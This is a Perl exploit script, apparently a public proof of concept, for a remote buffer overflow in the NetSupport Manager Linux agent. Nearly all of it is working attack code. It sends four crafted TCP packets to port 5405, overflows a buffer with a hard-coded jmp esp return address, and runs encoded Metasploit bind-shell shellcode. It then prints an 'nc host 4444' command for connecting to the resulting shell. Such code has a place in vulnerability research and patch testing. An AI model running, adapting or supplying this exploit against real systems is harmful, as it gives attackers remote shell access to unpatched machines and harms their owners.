#!/usr/bin/perl # # NetSupport Manager Agent Remote Buffer Overflow # Product details: http://www.netsupportmanager.com/ # # This vulnerability affects the following software: # # [Vulnerable] # NetSupport Manager for Linux v11.00 and likely all previous # NetSupport Manager for Solaris v9.50 and likely all previous # NetSupport Manager for Mac OS X v11.00 and likely all previous # # [Not Vulnerable] # Netsupport Manager for Windows v11.00 # # [Unknown] # Netsupport Manager for Windows CE v11.00 # Netsupport Manager for Pocket PC v11.00 # NetSupport Manager for DOS v7.01 # Other products based on the same codebase (e.g. NetSupport School) # # This exploit has been tested against: # - NetSupport Manager Linux agent v10.50.0 # - NetSupport Manager Linux agent v11.0.0 # # As far as I know, this is still unpatched (08/01/2011). # # Credit: Luca Carettoni (@_ikki) use strict; use warnings; use IO::Socket; my $host = shift || die "Usage: $0 host [port]\n"; my $port = shift || 5405; my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp') or die "error: $!\n"; print "--[ NetSupport Manager Linux Agent Remote Buffer Overflow ]\n"; print "--[ \@_ikki 2010 ]\n\n"; #my $ret_address = 0x0808bd4f; #jmp esp /usr/nsm/daemon/clientdaemon v10.50.0 my $ret_address = 0x0808c4bf; #jmp esp /usr/nsm/daemon/clientdaemon v11.0.0 my $pad = 976; my $nop = "\x90" x 50; # linux/x86/shell_bind_tcp - 217 bytes # http://www.metasploit.com # Encoder: x86/alpha_mixed # AutoRunScript=, AppendExit=false, PrependChrootBreak=false, # PrependSetresuid=false, InitialAutoRunScript=, # PrependSetuid=false, LPORT=4444, RHOST=, # PrependSetreuid=false my $shellcode = "\x89\xe0\xdb\xcb\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" . "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" . "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" . "\x75\x4a\x49\x46\x51\x49\x4b\x4c\x37\x4a\x43\x51\x43\x43" . "\x73\x43\x63\x43\x5a\x44\x42\x4c\x49\x4b\x51\x48\x30\x51" . "\x76\x4a\x6d\x4d\x50\x43\x6b\x51\x4e\x50\x52\x43\x58\x49" . "\x6f\x47\x72\x47\x61\x51\x4c\x43\x5a\x42\x30\x42\x71\x46" . "\x30\x4c\x49\x48\x61\x51\x7a\x45\x36\x46\x38\x48\x4d\x4d" . "\x50\x4c\x49\x51\x51\x46\x64\x4d\x63\x46\x64\x4c\x70\x45" . "\x36\x4a\x6d\x4b\x30\x51\x53\x4c\x70\x51\x76\x4a\x6d\x4b" . "\x30\x4e\x73\x50\x59\x50\x6a\x47\x4f\x46\x38\x4a\x6d\x4b" . "\x30\x47\x39\x43\x49\x49\x68\x50\x68\x46\x4f\x46\x4f\x42" . "\x53\x45\x38\x51\x78\x46\x4f\x45\x32\x50\x69\x50\x6e\x4d" . "\x59\x49\x73\x50\x50\x42\x73\x4b\x39\x49\x71\x4c\x70\x44" . "\x4b\x48\x4d\x4d\x50\x41\x41"; my $triggerA = "\x15\x00\x5a\x00".("\x41" x 1024)."\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; my $triggerB = "\x25\x00\x51\x00\x81\x41\x41\x41\x41\x41\x41\x00". "\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00"; my $triggerC = "\x37\x00\x03\x00\x0a\x00\x00\x00\x00\x00\x58\xb4". "\x92\xff\x00\x00\x69\x6b\x6b\x69\x00\x57\x4f\x52". "\x4b\x47\x52\x4f\x55\x50\x00\x3c\x3e". #pleasure trail ("A"x$pad).pack("V", $ret_address).$nop.$shellcode. "\x00\x00\x31\x32\x2e\x36\x32\x2e\x31\x2e\x34\x32". "\x30\x00\x31\x30\x00\x00"; my $triggerD = "\x06\x00\x07\x00\x20\x00\x00\x00\x0e\x00\x32\x00". "\x01\x10\x18\x00\x00\x01\x9f\x0d\x00\x00\xe0\x07". "\x06\x00\x07\x00\x00\x00\x00\x00\x02\x00\x4e\x00". "\x02\x00\xac\x00\x04\x00\x7f\x00\x00\x00"; print "Sending triggers...\n"; $sock->send($triggerA); sleep 1; $sock->send($triggerB); sleep 1; $sock->send($triggerC); sleep 1; $sock->send($triggerD); sleep 1; $sock->close; print "A shell is waiting: \"nc ".$host." 4444\"\n\n";